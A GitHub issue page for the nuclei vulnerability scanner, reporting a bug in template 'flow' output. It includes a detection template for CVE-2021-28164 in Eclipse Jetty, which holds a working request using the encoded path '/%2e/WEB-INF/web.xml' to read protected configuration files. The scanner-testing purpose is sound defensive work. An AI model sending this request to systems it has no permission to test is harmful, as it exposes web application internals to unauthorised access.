You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
id: CVE-2021-28164info:
name: Eclipse Jetty - Information Disclosureauthor: noamrathausseverity: mediumdescription: | Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224 is susceptible to improper authorization. The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. An attacker can access sensitive information regarding the implementation of a web application.impact: | An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access.remediation: | Apply the latest security patches or updates provided by the Eclipse Jetty project to fix the information disclosure vulnerability.reference:
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
- https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty
- https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E
- http://packetstormsecurity.com/files/164590/Jetty-9.4.37.v20210219-Information-Disclosure.html
- https://nvd.nist.gov/vuln/detail/cve-2021-28164classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:Ncvss-score: 5.3cve-id: CVE-2021-28164cwe-id: CWE-200,NVD-CWE-Otherepss-score: 0.04805epss-percentile: 0.9254cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:*metadata:
max-request: 2vendor: eclipseproduct: jettytags: cve2021,cve,packetstorm,vulhub,jetty,exposure,eclipseflow: log(http(1)) && log(http(2))http:
- method: GETpath:
- "{{BaseURL}}/WEB-INF/web.xml"matchers:
- type: dslinternal: truedsl:
- "!contains_all(body, '</web-app>', 'java.sun.com')"
- "!contains_all(header, 'application/xml')"
- "status_code != 200"
- "status_code != 404"condition: and
- method: GETpath:
- "{{BaseURL}}/%2e/WEB-INF/web.xml"matchers-condition: andmatchers:
- type: dsldsl:
- "contains_all(body, '</web-app>', 'java.sun.com')"
- "contains_all(header, 'application/xml')"
- "status_code == 200"condition: and
Current Behavior:
$ nuclei -t a.yaml -u "$TARGET" -ms __ _ ____ __ _______/ /__ (_) / __ \/ / / / ___/ / _ \/ / / / / / /_/ / /__/ / __/ //_/ /_/\__,_/\___/_/\___/_/ v3.2.2 projectdiscovery.io[INF] Current nuclei version: v3.2.2 (latest)[INF] Current nuclei-templates version: v9.8.0 (latest)[WRN] Scan results upload to cloud is disabled.[INF] New templates added in latest release: 85[INF] Templates loaded for current scan: 1[WRN] Loaded 1 unsigned templates for scan. Use with caution.[INF] Targets loaded for current scan: 1[JS] true[JS] false
Expected Behavior:
$ ./nuclei -t a.yaml -u "$TARGET" -ms __ _ ____ __ _______/ /__ (_) / __ \/ / / / ___/ / _ \/ / / / / / /_/ / /__/ / __/ //_/ /_/\__,_/\___/_/\___/_/ v3.2.3-dev projectdiscovery.io[INF] Current nuclei version: v3.2.3-dev (development)[INF] Current nuclei-templates version: v9.8.0 (latest)[WRN] Scan results upload to cloud is disabled.[INF] New templates added in latest release: 85[INF] Templates loaded for current scan: 1[WRN] Loading 1 unsigned templates for scan. Use with caution.[INF] Targets loaded for current scan: 1[JS] true[JS] false[CVE-2021-28164] [failed] [http] [medium] $TARGET
Steps To Reproduce:
Anything else:
The text was updated successfully, but these errors were encountered:
tarunKoyalwar
added
the
Type: Bug
Inconsistencies or issues which will cause an issue or problem for users or implementors.
label
Apr 2, 2024
Nuclei version:
main | latest
template
Current Behavior:
Expected Behavior:
Steps To Reproduce:
Anything else:
The text was updated successfully, but these errors were encountered: